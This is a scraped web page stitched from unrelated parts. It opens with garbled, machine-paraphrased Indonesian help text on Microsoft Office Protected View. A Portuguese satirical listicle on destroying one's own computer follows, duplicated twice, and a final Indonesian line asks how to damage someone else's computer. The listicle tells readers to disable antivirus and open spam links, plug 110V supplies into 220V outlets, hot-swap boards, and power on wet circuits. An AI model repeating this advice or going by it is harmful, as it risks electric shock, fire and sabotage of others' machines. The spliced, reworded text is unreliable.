lain mengonfigurasi supremsi ini, file database yang dibuka dari lokasi yang tidak tepercaya tidak dibuka n domestik Tampilan Terproteksi. Dominasi ini pula bisa dikonfigurasi oleh administrator misal kebijakan melalui Kebijakan Grup maupun layanan kebijakan cloud Microsoft 365. CatatanYuridiksi kebijakan ini saja dolan bikin barang Microsoft 365. Saya ingin menyendal kepercayaan berusul dokumen yang sebelumnya saya percayai kerjakan tidak dibuka dalam Tampilan Terproteksi Kalau sebelumnya Anda memercayai tindasan kerjakan dibuka di asing Tampilan Terproteksi dengan 1 mengklik “Aktifkan Penyuntingan” alias “Percayai Dokumen Dari Pemakai Ini” di jidar wanti-wanti atau 2 mengklik “Patuh Edit” ketika file tak ki amblas pengecekan, silakan merujuk ke panduan di sumber akar Dokumen tepercaya untuk menyetip kepercayaan dan membuka kembali piagam internal Tampilan Terproteksi. Apa yang terjadi pada add-in dalam Tampilan Terproteksi? Add-in boleh bepergian saat sebuah file ternganga di Tampilan Terproteksi, doang mungkin tidak berfungsi sama dengan yang diharapkan. Jika add-in Anda tidak berjalan dengan ter-hormat, hubungi penulis add-in. Mungkin diperlukan versi nan makin baru, yang kompatibel dengan Tampilan Terproteksi. Barang apa nan terjadi lega font mega dalam Tampilan Terproteksi? Orang nan mengirimkan tindasan kepada Ia kali menggunakan font awan, yaitu font yang tidak disertakan dengan Windows atau Office, belaka harus diunduh semenjak Internet pada kali mula-mula font digunakan. Jika demikian dan font belum terinstal, font tidak akan diunduh ketika menggunakan Tampilan Terproteksi. Word akan mencoba menggantinya dengan font lain nan tetap terlihat bagus. Jika optimistis bahwa dokumen tersebut kesatuan hati dan Anda cak hendak melihatnya dengan pendirian yang diinginkan juru tulis, aktifkan penyuntingan sehingga Word dapat mengunduh dan menginstal font yang tepat. CoretanJika Word tak bisa menemukan font apa pun yang boleh menggantikannya, Sira siapa mengawasi kotak hitam di area teks agar produktif. Perbaiki masalah tersebut dengan mengaktifkan pengeditan sehingga font nan tepat boleh diunduh. Bagaimana pendirian memperalat Tampilan Terproteksi dengan pembaca layar? Saat Kamu berada dalam tampilan terproteksi, pengeditan dikunci, sehingga Anda tidak bisa kerubung pertinggal sebagaimana nan diharapkan. Doang, jika Anda perlu menavigasi arsip dalam Tampilan Terproteksi dengan pembaca layar, Anda dapat menekan F7 untuk mengaktifkan penelusuran berkursor. Tindakan ini akan memungkinkan Dia menavigasi teks tanpa berada dalam mode edit. Tatap Juga Membuka dokumen sesudah terjadi kesalahan kerusakan file Memeriksa kompatibilitas file dengan versi yang lebih lama Menambahkan atau menghapus perlindungan intern sertifikat, buku kerja, ataupun presentasi Anda Source Não é difícil de ouvir por aí frases como "não se fazem mais eletrônicos e computadores como antigamente". Isso é verdade, pois com a evolução de todas as máquinas, a fragilidade e a descartabilidade estão sobressaindo cada vez mais, com placas que queimam e nos deixam na mão quando mais claro que é difícil alguém simplesmente querer destruir seu computador, mas há essa possibilidade. Parece até loucura, mas chegou a hora de listarmos várias formas de como você pode se vingar de seu amigo, que vive deixando-o na mão e se estragando quando deveria funcionar um vírusQuando se pensa na destruição de um computador, é inevitável que a primeira coisa que venha à cabeça seja pegar um excelente vírus, daqueles que conseguem engolir os dados como um Pac-Man e, ainda por cima, se enviar para todas as pessoas da lista de contatos do Orkut, Outlook, Skype, MSN diversas formas de se conseguir pegar um vírus, mas o modo mais fácil é ir direto ao local em que eles mais aparecem. Quem nunca se deparou com um monte de mensagens recebidas em mensageiros instantâneos ou na caixa de email, que diziam algo como “Veja as fotos da festa, ficaram ótimas!” e, logo em seguida, traziam um link?Tudo que você precisa fazer é clicar nesse link e se divertir. Mas atenção a probabilidade de você repassar isso para seus contatos é realmente muito alta. Outra maneira de pegar vírus é acessar a caixa de SPAM de seu email e clicar em cada uma das mensagens recebidas. Em alguma delas você provavelmente vai encontrar uma surpresa. Ah, não se esqueça de desativar o antivírus antes de fazer tudo todos os coolersO problema dos vírus é que, normalmente, eles não são capazes de destruir o computador fisicamente, a ponto de inutilizar para sempre alguma peça de hardware. Sendo assim, outra maneira de acabar com o PC é apelar para o superaquecimento de cada uma das placas que estiverem dentro do assim, se você costuma se divertir com games de excelentes gráficos em seu computador, deve ter uma boa placa de vídeo ligada à fonte. Esse tipo de hardware é um dos que mais esquentam dentro do gabinete, até por consumirem bastante energia elétrica para o modo mais fácil de queimar algo é tirando o cooler para impedir que tal peça consiga se resfriar ao mesmo tempo em que esquenta. Dessa forma, dê prioridade para a retirada, ao menos, do cooler da placa gráfica. Em seguida, abra um jogo que exija bastante dela e aguarde até que seu computador quase pegue piorar ainda mais a ventilação, não é má ideia tirar cada um dos coolers que estão no computador e deixá-lo o mais cheio de poeira e sujeira possível. Isso, com certeza, vai acarretar em uma concentração de calor no gabinete suficiente para deixar “a coisa preta”.Tomada sobrecarregada ou com voltagem diferenteHá outras formas muito divertidas de se queimar o computador. A dica seguinte vai garantir que você consiga, ao menos, destruir a fonte e evitar que você consiga ligar o PC novamente. Experimente usar diversos “benjamins” para conectar à tomada o máximo de equipamentos eletrônicos que você conseguir — entretanto, evite pois agora é hora de exagerar ligue fornos elétricos, liquidificadores e até outros computadores ao mesmo tempo. Ligue o PC nessa tomada com vários outros eletrônicos para sobrecarregar e criar um curto-circuito. O único problema é que isso pode acabar queimando tudo que estiver conectado no momento, não somente sua forma de queimá-lo, mas sem causar problemas a outros equipamentos, é ligando o PC que estiver com uma fonte de voltagem 110 em uma tomada 220V. Com certeza essa sobrecarga vai fazer muito mais do que um overclock bom e exageradoVoltando para o aquecimento das placas, você também pode fazer overclocks. Você provavelmente já ouviu falar desse método, que nada mais é do que forçar o processamento do CPU ou do GPU para além do que ele aguenta. Com a ajuda de alguns softwares, é possível realizar o procedimento, com ou sem estragar as peças a ponto de colocar fogo nelas, não é uma má ideia fazer o procedimento de maneira extremamente exagerada, colocando a taxa de aumento de performance em níveis muito mais altos do que o normal. Isso provavelmente vai tornar o cooler inútil e fazer as placas chegarem a temperaturas as peças de hardware de qualquer jeitoEm alguns casos, as placas podem ficar com problema no contato naturalmente, sem que o usuário mexa em nada. Entretanto, você mesmo pode causar um grande dano ao computador ao conectar tudo de qualquer jeito e onde não placas completamente incompatíveis com os slots, seja por questão de compatibilidade ou de formato de encaixe, é o jeito certo de causar problemas sérios e estragar o hardware. Basta forçar os pentes de memória da melhor maneira possível e conectar todos os cabos de força de forma incorreta e nos locais errados. Assim que você ligar o PC é possível que você consiga ver até se você não está nem um pouco preocupado com a sua segurança, experimente trocar as placas e conectá-las enquanto o computador estiver totalmente ligado. Além de queimar os componentes, é possível conseguir até levar um no meio dos animaisMorando em casa ou apartamento, é normal que a pessoa tenha animais de estimação de todos os tipos cachorros, gatos e até pequenos hamsters. Geralmente deve-se manter o computador afastado dos bichinhos, para que não aconteça nada grave com o aparelho, nem com se o que você quer é prejudicar o PC para valer, não é uma má ideia deixar ao alcance de animais domésticos nada adestrados, para que façam suas necessidades e fiquem sempre subindo e batendo no computador. Os pelos, principalmente dos gatos, devem acabar entrando e se juntando à poeira nas placas. Mas vale prestar atenção e deixar a tampa do gabinete fechada, para evitar que acidentes acabem acontecendo com os o PC à vontade para as criançasÉ indiscutível toda criança pode ser considerada uma máquina de destruir computadores. Elas estão apenas em uma fase de exploração e novas descobertas, então mexer a fundo no PC em cada uma das funções que existem é bastante que a intenção é acabar com o computador e torná-lo inútil, é fundamental deixá-lo ao alcance dos pequenos para que eles baixem o que quiserem, instalem todo tipo de porcarias e saiam clicando em absolutamente tudo. No começo, o computador é somente desconfigurado, mas logo acaba sendo infestado de vírus e programas problemáticos. No mínimo, você vai precisar formatá-lo para trazê-lo de volta à perto do computadorDigamos que você more em uma das cidades do sul do país e sofra bastante com o clima, principalmente no inverno. Sua casa não tem lareira e nenhum tipo de preparação para enfrentar quedas tão bruscas de temperatura e você tenta se esquentar de todas as maneiras possíveis, mas quer permanecer no há alternativa alguma, você vai precisar de um bom e potente aquecedor para deixar o clima agradável. Mas, como você também quer destruir o computador, por que não ligar vários aparelhos justamente em volta do PC? E se as placas estiverem sem os coolers ligados, melhor ainda. Quem sabe tudo acabe eventuais batidas no PC quando ele não funcionarQuando você mais precisa do computador, ele parece não funcionar. As costumeiras travadas acontecem a todo o momento e o tempo de início do sistema operacional passa de dez minutos. Abrir um programa é um sacrifício enorme e você não consegue ver nenhum arquivo do disco rígido. A solução é simples dê uma boa pancada no os problemas acontecendo com tanta frequência, o seu pé de preferência protegido por uma boa bota vai acabar se acostumando a ir com a maior força na direção do gabinete. Se isso não causar trilhas defeituosas no disco rígido ou até curtos-circuitos no hardware, vai garantir ao menos alguns amassados. Além de tudo, serve como terapia para a falta de paciência com a tudo bem limpinhoTodo brasileiro que tem um carro gosta de cuidar dele e deixá-lo sempre bem limpinho. Sendo assim, aproveite os finais de semana e, no dia de lavar o veículo, pegue também o computador para fazer uma boa limpeza com um balde cheio d’água. Esfregue bem os circuitos com sabão e deixe tudo é má ideia conectar as placas ainda molhadas e ligar o PC logo em seguida. Só tome cuidado para não ser com o carro por cimaNenhuma das dicas acima funcionou ou atendeu às suas expectativas? Bem, parece que a última solução para destruir o computador é a mais bruta possível atropelamento. Com uma pancada tão forte, as placas vão se soltar, amassar e até perder algumas partes durante o impacto, tornando a máquina totalmente inutilizável.. . . . .É possível encarar as dicas de duas formas diferentes assumindo-as como as melhores para destruir seu computador ou fazendo exatamente o contrário. Dessa forma, sua máquina fica o mais longe de perigos e com certeza tem a vida útil aumentada. E você, tem alguma dica para adicionar à lista? Compartilhe-a nos o seu computador é fácil. Veja como!Há diversas maneiras de acabar com sua máquina. Veja aqui algumas é difícil de ouvir por aí frases como "não se fazem mais eletrônicos e computadores como antigamente". Isso é verdade, pois com a evolução de todas as máquinas, a fragilidade e a descartabilidade estão sobressaindo cada vez mais, com placas que queimam e nos deixam na mão quando mais claro que é difícil alguém simplesmente querer destruir seu computador, mas há essa possibilidade. Parece até loucura, mas chegou a hora de listarmos várias formas de como você pode se vingar de seu amigo, que vive deixando-o na mão e se estragando quando deveria funcionar um vírusQuando se pensa na destruição de um computador, é inevitável que a primeira coisa que venha à cabeça seja pegar um excelente vírus, daqueles que conseguem engolir os dados como um Pac-Man e, ainda por cima, se enviar para todas as pessoas da lista de contatos do Orkut, Outlook, Skype, MSN diversas formas de se conseguir pegar um vírus, mas o modo mais fácil é ir direto ao local em que eles mais aparecem. Quem nunca se deparou com um monte de mensagens recebidas em mensageiros instantâneos ou na caixa de email, que diziam algo como “Veja as fotos da festa, ficaram ótimas!” e, logo em seguida, traziam um link?Tudo que você precisa fazer é clicar nesse link e se divertir. Mas atenção a probabilidade de você repassar isso para seus contatos é realmente muito alta. Outra maneira de pegar vírus é acessar a caixa de SPAM de seu email e clicar em cada uma das mensagens recebidas. Em alguma delas você provavelmente vai encontrar uma surpresa. Ah, não se esqueça de desativar o antivírus antes de fazer tudo todos os coolersO problema dos vírus é que, normalmente, eles não são capazes de destruir o computador fisicamente, a ponto de inutilizar para sempre alguma peça de hardware. Sendo assim, outra maneira de acabar com o PC é apelar para o superaquecimento de cada uma das placas que estiverem dentro do assim, se você costuma se divertir com games de excelentes gráficos em seu computador, deve ter uma boa placa de vídeo ligada à fonte. Esse tipo de hardware é um dos que mais esquentam dentro do gabinete, até por consumirem bastante energia elétrica para o modo mais fácil de queimar algo é tirando o cooler para impedir que tal peça consiga se resfriar ao mesmo tempo em que esquenta. Dessa forma, dê prioridade para a retirada, ao menos, do cooler da placa gráfica. Em seguida, abra um jogo que exija bastante dela e aguarde até que seu computador quase pegue piorar ainda mais a ventilação, não é má ideia tirar cada um dos coolers que estão no computador e deixá-lo o mais cheio de poeira e sujeira possível. Isso, com certeza, vai acarretar em uma concentração de calor no gabinete suficiente para deixar “a coisa preta”.Tomada sobrecarregada ou com voltagem diferenteHá outras formas muito divertidas de se queimar o computador. A dica seguinte vai garantir que você consiga, ao menos, destruir a fonte e evitar que você consiga ligar o PC novamente. Experimente usar diversos “benjamins” para conectar à tomada o máximo de equipamentos eletrônicos que você conseguir — entretanto, evite pois agora é hora de exagerar ligue fornos elétricos, liquidificadores e até outros computadores ao mesmo tempo. Ligue o PC nessa tomada com vários outros eletrônicos para sobrecarregar e criar um curto-circuito. O único problema é que isso pode acabar queimando tudo que estiver conectado no momento, não somente sua forma de queimá-lo, mas sem causar problemas a outros equipamentos, é ligando o PC que estiver com uma fonte de voltagem 110 em uma tomada 220V. Com certeza essa sobrecarga vai fazer muito mais do que um bom overclockVoltando para o aquecimento das placas, você também pode fazer overclocks. Você provavelmente já ouviu falar desse método, que nada mais é do que forçar o processamento do CPU ou do GPU para além do que ele aguenta. Com a ajuda de alguns softwares, é possível realizar o procedimento, com ou sem estragar as peças a ponto de colocar fogo nelas, não é uma má ideia fazer o procedimento de maneira extremamente exagerada, colocando a taxa de aumento de performance em níveis muito mais altos do que o normal. Isso provavelmente vai tornar o cooler inútil e fazer as placas chegarem a temperaturas as peças de hardware de qualquer jeitoEm alguns casos, as placas podem ficar com problema no contato naturalmente, sem que o usuário mexa em nada. Entretanto, você mesmo pode causar um grande dano ao computador ao conectar tudo de qualquer jeito e onde não placas completamente incompatíveis com os slots, seja por questão de compatibilidade ou de formato de encaixe, é o jeito certo de causar problemas sérios e estragar o hardware. Basta forçar os pentes de memória da melhor maneira possível e conectar todos os cabos de força de forma incorreta e nos locais errados. Assim que você ligar o PC é possível que você consiga ver até se você não está nem um pouco preocupado com a sua segurança, experimente trocar as placas e conectá-las enquanto o computador estiver totalmente ligado. Além de queimar os componentes, é possível conseguir até levar um no meio dos animaisMorando em casa ou apartamento, é normal que a pessoa tenha animais de estimação de todos os tipos cachorros, gatos e até pequenos hamsters. Geralmente deve-se manter o computador afastado dos bichinhos, para que não aconteça nada grave com o aparelho, nem com eles. Entretanto, se o que você quer é prejudicar o PC para valer, não é uma má ideia deixar ao alcance de animais domésticos nada adestrados, para que façam suas necessidades e fiquem sempre subindo e batendo no computador. Os pelos, principalmente dos gatos, devem acabar entrando e se juntando à poeira nas placas. Mas vale prestar atenção e deixar a tampa do gabinete fechada, para evitar que acidentes acabem acontecendo com os o PC à vontade para as criançasÉ indiscutível toda criança pode ser considerada uma máquina de destruir computadores. Elas estão apenas em uma fase de exploração e novas descobertas, então mexer a fundo no PC em cada uma das funções que existem é bastante normal. Sendo que a intenção é acabar com o computador e torná-lo inútil, é fundamental deixá-lo ao alcance dos pequenos para que eles baixem o que quiserem, instalem todo tipo de porcarias e saiam clicando em absolutamente tudo. No começo, o computador é somente desconfigurado, mas logo acaba sendo infestado de vírus e programas problemáticos. No mínimo, você vai precisar formatá-lo para trazê-lo de volta à perto do computadorDigamos que você more em uma das cidades do sul do país e sofra bastante com o clima, principalmente no inverno. Sua casa não tem lareira e nenhum tipo de preparação para enfrentar quedas tão bruscas de temperatura e você tenta se esquentar de todas as maneiras possíveis, mas quer permanecer no há alternativa alguma, você vai precisar de um bom e potente aquecedor para deixar o clima agradável. Mas, como você também quer destruir o computador, por que não ligar vários aparelhos justamente em volta do PC? E se as placas estiverem sem os coolers ligados, melhor eventuais batidas no PC quando ele não funcionarQuando você mais precisa do computador, ele parece não funcionar. As costumeiras travadas acontecem a todo o momento e o tempo de início do sistema operacional passa de dez minutos. Abrir um programa é um sacrifício enorme e você não consegue ver nenhum arquivo do disco rígido. A solução é simples dê uma boa pancada no os problemas acontecendo com tanta frequência, o seu pé de preferência protegido por uma boa bota vai acabar se acostumando a ir com a maior força na direção do gabinete. Se isso não causar trilhas defeituosas no disco rígido ou até curtos-circuitos no hardware, vai garantir ao menos alguns amassados. Além de tudo, serve como terapia para a falta de paciência com a tudo bem limpinhoTodo brasileiro que tem um carro gosta de cuidar dele e deixá-lo sempre bem limpinho. Sendo assim, aproveite os finais de semana e, no dia de lavar o veículo, pegue também o computador para fazer uma boa limpeza com um balde cheio d’água. Esfregue bem os circuitos com sabão e deixe tudo brilhando. Não é má ideia conectar as placas ainda molhadas e ligar o PC logo em seguida. Só tome cuidado para não ser com o carro por cimaNenhuma das dicas acima funcionou ou atendeu às suas expectativas? Bem, parece que a última solução para destruir o computador é a mais bruta possível atropelamento. Com uma pancada tão forte, as placas vão se soltar, amassar e até perder algumas partes durante o impacto, tornando a máquina totalmente inutilizável.. . . . .É possível encarar as dicas de duas formas diferentes assumindo-as como as melhores para destruir seu computador ou fazendo exatamente o contrário. Dessa forma, sua máquina fica o mais longe de perigos e com certeza tem a vida útil aumentada. E você, tem alguma dica para adicionar à lista? Compartilhe-a nos comentários.

cara merusak komputer orang lain